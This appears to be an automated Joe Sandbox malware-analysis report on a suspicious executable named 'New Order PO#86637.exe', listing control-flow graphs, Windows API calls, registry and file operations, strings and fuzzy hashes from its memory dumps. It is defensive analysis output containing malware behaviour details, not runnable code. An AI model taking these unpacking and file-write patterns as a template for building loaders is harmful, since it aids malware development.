                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _malloc
                                                                            • String ID: Default
                                                                            • API String ID: 1579825452-753088835
                                                                            • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                            • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                            • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                            • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1054 40f5c0-40f5cf call 422240 1057 40f5d0-40f5e8 1054->1057 1057->1057 1058 40f5ea-40f613 call 413650 call 410e60 1057->1058 1063 40f614-40f633 call 414d04 1058->1063 1066 40f691 1063->1066 1067 40f635-40f63c 1063->1067 1068 40f696-40f69c 1066->1068 1069 40f660-40f674 call 4150d1 1067->1069 1070 40f63e 1067->1070 1073 40f679-40f67c 1069->1073 1072 40f640 1070->1072 1074 40f642-40f650 1072->1074 1073->1063 1075 40f652-40f655 1074->1075 1076 40f67e-40f68c 1074->1076 1079 40f65b-40f65e 1075->1079 1080 425d1e-425d3e call 4150d1 call 414d04 1075->1080 1077 40f68e-40f68f 1076->1077 1078 40f69f-40f6ad 1076->1078 1077->1075 1082 40f6b4-40f6c2 1078->1082 1083 40f6af-40f6b2 1078->1083 1079->1069 1079->1072 1090 425d43-425d5f call 414d30 1080->1090 1085 425d16 1082->1085 1086 40f6c8-40f6d6 1082->1086 1083->1075 1085->1080 1088 425d05-425d0b 1086->1088 1089 40f6dc-40f6df 1086->1089 1088->1074 1091 425d11 1088->1091 1089->1075 1090->1068 1091->1085
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock_fseek_memmove_strcat
                                                                            • String ID: AU3!$EA06
                                                                            • API String ID: 1268643489-2658333250
                                                                            • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                            • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                            • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                            • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1094 401100-401111 1095 401113-401119 1094->1095 1096 401179-401180 1094->1096 1098 401144-40114a 1095->1098 1099 40111b-40111e 1095->1099 1096->1095 1097 401182 1096->1097 1100 40112c-401141 DefWindowProcW 1097->1100 1102 401184-40118e call 401250 1098->1102 1103 40114c-40114f 1098->1103 1099->1098 1101 401120-401126 1099->1101 1101->1100 1105 42b038-42b03f 1101->1105 1109 401193-40119a 1102->1109 1106 401151-401157 1103->1106 1107 40119d 1103->1107 1105->1100 1108 42b045-42b059 call 401000 call 40e0c0 1105->1108 1112 401219-40121f 1106->1112 1113 40115d 1106->1113 1110 4011a3-4011a9 1107->1110 1111 42afb4-42afc5 call 40f190 1107->1111 1108->1100 1110->1101 1119 4011af 1110->1119 1111->1109 1112->1101 1116 401225-42b06d call 468b0e 1112->1116 1114 401163-401166 1113->1114 1115 42b01d-42b024 1113->1115 1120 42afe9-42b018 call 40f190 call 401a50 1114->1120 1121 40116c-401172 1114->1121 1115->1100 1127 42b02a-42b033 call 4370f4 1115->1127 1116->1109 1119->1101 1125 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1119->1125 1126 4011db-401202 SetTimer RegisterWindowMessageW 1119->1126 1120->1100 1121->1101 1129 401174-42afde call 45fd57 1121->1129 1126->1109 1134 401204-401216 CreatePopupMenu 1126->1134 1127->1100 1129->1100 1145 42afe4 1129->1145 1145->1109
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                            • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                            • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                            • CreatePopupMenu.USER32 ref: 00401204
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 129472671-2362178303
                                                                            • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                            • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                            • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                            • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1146 4115d7-4115df 1147 4115ee-4115f9 call 4135bb 1146->1147 1150 4115e1-4115ec call 411988 1147->1150 1151 4115fb-4115fc 1147->1151 1150->1147 1154 4115fd-41160e 1150->1154 1155 411610-41163b call 417fc0 call 41130a 1154->1155 1156 41163c-411656 call 4180af call 418105 1154->1156 1155->1156
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 004115F1
                                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                            • std::exception::exception.LIBCMT ref: 00411626
                                                                            • std::exception::exception.LIBCMT ref: 00411640
                                                                            • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                            • String ID: ,*H$4*H$@fI
                                                                            • API String ID: 615853336-1459471987
                                                                            • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                            • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                            • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                            • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1165 42099a8-42099fa call 42098a8 CreateFileW 1168 4209a03-4209a10 1165->1168 1169 42099fc-42099fe 1165->1169 1172 4209a12-4209a1e 1168->1172 1173 4209a23-4209a3a VirtualAlloc 1168->1173 1170 4209b5c-4209b60 1169->1170 1172->1170 1174 4209a43-4209a69 CreateFileW 1173->1174 1175 4209a3c-4209a3e 1173->1175 1177 4209a6b-4209a88 1174->1177 1178 4209a8d-4209aa7 ReadFile 1174->1178 1175->1170 1177->1170 1179 4209aa9-4209ac6 1178->1179 1180 4209acb-4209acf 1178->1180 1179->1170 1181 4209af0-4209b07 WriteFile 1180->1181 1182 4209ad1-4209aee 1180->1182 1185 4209b32-4209b57 CloseHandle VirtualFree 1181->1185 1186 4209b09-4209b30 1181->1186 1182->1170 1185->1170 1186->1170
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 042099ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2085910574.0000000004209000.00000040.00000020.00020000.00000000.sdmp, Offset: 04209000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_4209000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                            • Instruction ID: 67e8223ac80ea2562b317202574ae5f6cea216ab0554db9f4424ccb3b6d2c1a6
                                                                            • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                            • Instruction Fuzzy Hash: 4851FD75B50209BBDF20DFA4CC49FDE77B4AF48710F108554F64AAB1C1DA74A644DB60

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1195 4102b0-4102c5 SHGetMalloc 1196 4102cb-4102da SHGetDesktopFolder 1195->1196 1197 425dfd-425e0e call 433244 1195->1197 1198 4102e0-41031a call 412fba 1196->1198 1199 41036b-410379 1196->1199 1207 410360-410368 1198->1207 1208 41031c-410331 SHGetPathFromIDListW 1198->1208 1199->1197 1205 41037f-410384 1199->1205 1207->1199 1209 410351-41035d 1208->1209 1210 410333-41034a call 412fba 1208->1210 1209->1207 1210->1209
                                                                            APIs
                                                                            • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                            • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                            • _wcsncpy.LIBCMT ref: 004102ED
                                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                            • _wcsncpy.LIBCMT ref: 00410340
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                            • String ID: C:\Users\user\Desktop\New Order PO#86637.exe
                                                                            • API String ID: 3170942423-4291297029
                                                                            • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                            • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                            • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                            • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1213 40e4c0-40e4e5 call 403350 RegOpenKeyExW 1216 427190-4271ae RegQueryValueExW 1213->1216 1217 40e4eb-40e4f0 1213->1217 1218 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 1216->1218 1219 42721a-42722a RegCloseKey 1216->1219 1224 427210-427219 call 436508 1218->1224 1225 4271f7-42720e call 402160 1218->1225 1224->1219 1225->1224
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$CloseOpen
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt
                                                                            • API String ID: 1586453840-614718249
                                                                            • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                            • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                            • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                            • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1230 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                                            APIs
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                            • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                            • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                            • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                            • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                            • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                            • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                            • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Close$OpenQueryValue
                                                                            • String ID: Control Panel\Mouse
                                                                            • API String ID: 1607946009-824357125
                                                                            • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                            • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                            • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                            • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                            APIs
                                                                              • Part of subcall function 0420B328: Sleep.KERNELBASE(000001F4), ref: 0420B339
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0420B547
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2085910574.0000000004209000.00000040.00000020.00020000.00000000.sdmp, Offset: 04209000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_4209000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileSleep
                                                                            • String ID: YV738UQ9E18K9CVQ
                                                                            • API String ID: 2694422964-1238100268
                                                                            • Opcode ID: 96e464dc7010ef5662850ee2b13d198ede6a2bdc27f7c97ea1fbcf708c22a0fc
                                                                            • Instruction ID: 45037894c9298d85c4faee20147c7234f0dd0fb92f6809a90b353a7fd4406344
                                                                            • Opcode Fuzzy Hash: 96e464dc7010ef5662850ee2b13d198ede6a2bdc27f7c97ea1fbcf708c22a0fc
                                                                            • Instruction Fuzzy Hash: 51518431E14249DAEF21DBE4C804BEFBBB4AF19304F008599E6097B2C1D7B56B49CB65
                                                                            APIs
                                                                              • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                            • _free.LIBCMT ref: 004295A0
                                                                              • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                              • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                              • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                              • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                              • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                              • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                            • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\New Order PO#86637.exe
                                                                            • API String ID: 3938964917-3650315919
                                                                            • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                            • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                            • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                                                            • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: Error:
                                                                            • API String ID: 4104443479-232661952
                                                                            • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                            • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                            • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                            • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                            APIs
                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\New Order PO#86637.exe,0040F545,C:\Users\user\Desktop\New Order PO#86637.exe,004A90E8,C:\Users\user\Desktop\New Order PO#86637.exe,?,0040F545), ref: 0041013C
                                                                              • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                              • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                              • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                              • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
